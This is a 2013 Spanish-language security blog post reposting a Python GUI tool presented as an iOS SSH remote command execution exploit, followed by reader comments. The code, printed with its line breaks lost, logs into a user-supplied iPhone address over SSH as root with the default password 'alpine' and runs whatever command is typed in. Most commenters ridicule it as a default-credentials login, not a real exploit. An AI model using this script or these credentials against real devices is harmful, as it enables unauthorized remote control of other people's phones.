23 may 2013

Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit

Al parecer en los dispositivos iOS se puede hacer ejecución de código remoto mediante ssh, D35m0nd142 hace un exploit demostrando esta acción.

Comparto el enlace en 1137day y el codigo.http://1337day.com/exploits/14805

#!/usr/bin/python# When you've launched the command look the terminal# This software work without Metasploit # Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit# Exploit Author: D35m0nd142# Vendor Homepage: http://www.apple.com# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premiumimport paramiko import Tkinter from tkMessageBox import *import sysimport osprint "******************************************************************"print "*Apple iPhone iOS Default SSH Remote Command Execution exploit   *"print "*                 Created by D35m0nd142                          *"print "******************************************************************\n" root=Tkinter.Tk()root.geometry("%dx%d" % (490,220))def exploit(): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ip_iphone=ip.get() ssh.connect(ip_iphone,username='root',password='alpine') cmd=command.get() stdin, stdout, stderr = ssh.exec_command(cmd) print stdout.readlines() ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack()  ssh.close()root['bg']="black"root.title("Apple iOS Default SSH Remote Command Execution exploit")message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')ip_label=Tkinter.Label(text="iPhone IP: ").pack()ip=Tkinter.StringVar()ip_entry=Tkinter.Entry(textvariable=ip).pack()command_label=Tkinter.Label(text="Command to execute: ").pack()command=Tkinter.StringVar()command_entry=Tkinter.Entry(textvariable=command).pack()launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()root.mainloop()

8 comentarios:

  1. Mmmm un exploit? O credenciales por defecto, todo un clásico desde hace.... 4 años? mmmmmPensaba que flu project tenía más criterio :)

    ResponderEliminar
  2. Lol, pedazo de exploit. Este es el artículo más flojo del blog en mucho tiempo, afortunadamente.

    ResponderEliminar
  3. Lamentable un post como este. Aunque la verdad es que es un habitual este tipo de post chorras y con barbaridades en Flu.Yo creía que los que llevaban el blog eran profesionales competentes.Me decepcionais mucho chicos...

    ResponderEliminar
  4. jajajajajaj y esto me mata:Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home PremiumAhi en caso de ser un exploit habría que poner en que versiones de IOS ha sido testeado, no desde donde se ha lanzado!! jajajajajPablo o Juan Antonio, ¿Quién ha sido el que ha dejado que este post se publique?

    ResponderEliminar
  5. Un blog libre, para que digáis lo que queráis... me encantan los comentarios negativos, poco constructivos, más destructivos, pero al fin y al cabo interesantes... Bueno, os agradecemos los comentarios, si queréis meter unos links también os dejamos, o un correo de contacto, y debatimos, no problem! :D

    ResponderEliminar
  6. Pablo, acaso tu piensas que ese código es un exploit???De verdad???Creo que me estoy perdiendo... Tu eres el mismo Pablo que ha escrito el libro de Metasploit o eres otro??? Porque en caso de serlo creo que rectificar el título y contenido del post es lo menos que podías hacer. Supuse que os la habrían colado pero ver que lo habéis subido a sabiendas me parece como dice mi nombre vergonzoso y totalmente falto de profesionalidad!Un saludo

    ResponderEliminar
  7. el enlace ni tan sólo va a ese exploit...

    ResponderEliminar